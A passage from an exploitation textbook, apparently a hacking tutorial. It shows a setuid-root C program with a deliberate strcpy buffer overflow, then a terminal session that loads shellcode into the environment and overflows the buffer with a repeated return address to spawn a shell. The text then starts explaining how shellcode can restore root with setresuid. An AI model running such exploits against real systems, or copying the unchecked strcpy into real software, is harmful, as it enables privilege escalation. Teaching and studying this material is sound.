300 0x500
drop_privs.c
#include <unistd.h>
void lowered_privilege_function(unsigned char *ptr) {
char buffer[50];
seteuid(5); // Drop privileges to games user.
strcpy(buffer, ptr);
}
int main(int argc, char *argv[]) {
if (argc > 0)
lowered_privilege_function(argv[1]);
}Even though this compiled program is setuid root, the privileges are
dropped to the games user before the shellcode can execute. This only
spawns a shell for the games user, without root access.reader@hacking:~/booksrc $ gcc -o drop_privs drop_privs.c
reader@hacking:~/booksrc $ sudo chown root ./drop_privs; sudo chmod u+s ./drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xcb\xf9\xff\xbf"x40')
sh-3.2$ whoami
games
sh-3.2$ id
uid=999(reader) gid=999(reader) euid=5(games)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scan
ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3.2$
Fortunately, the privileges can easily be restored at the beginning of our
shellcode with a system call to set the privileges back to root. The most com-
plete way to do this is with a setresuid() system call, which sets the real,
effective, and saved user IDs. The system call number and manual page are
shown below.reader@hacking:~/booksrc $ grep -i setresuid /usr/include/asm-i386/unistd.h
#define __NR_setresuid 164
#define __NR_setresuid32 208
reader@hacking:~/booksrc $ man 2 setresuid
SETRESUID(2) Linux Programmer's Manual SETRESUID(2)
NAME
setresuid, setresgid - set real, effective and saved user or group ID
SYNOPSIS
#define _GNU_SOURCE
#include <unistd.h>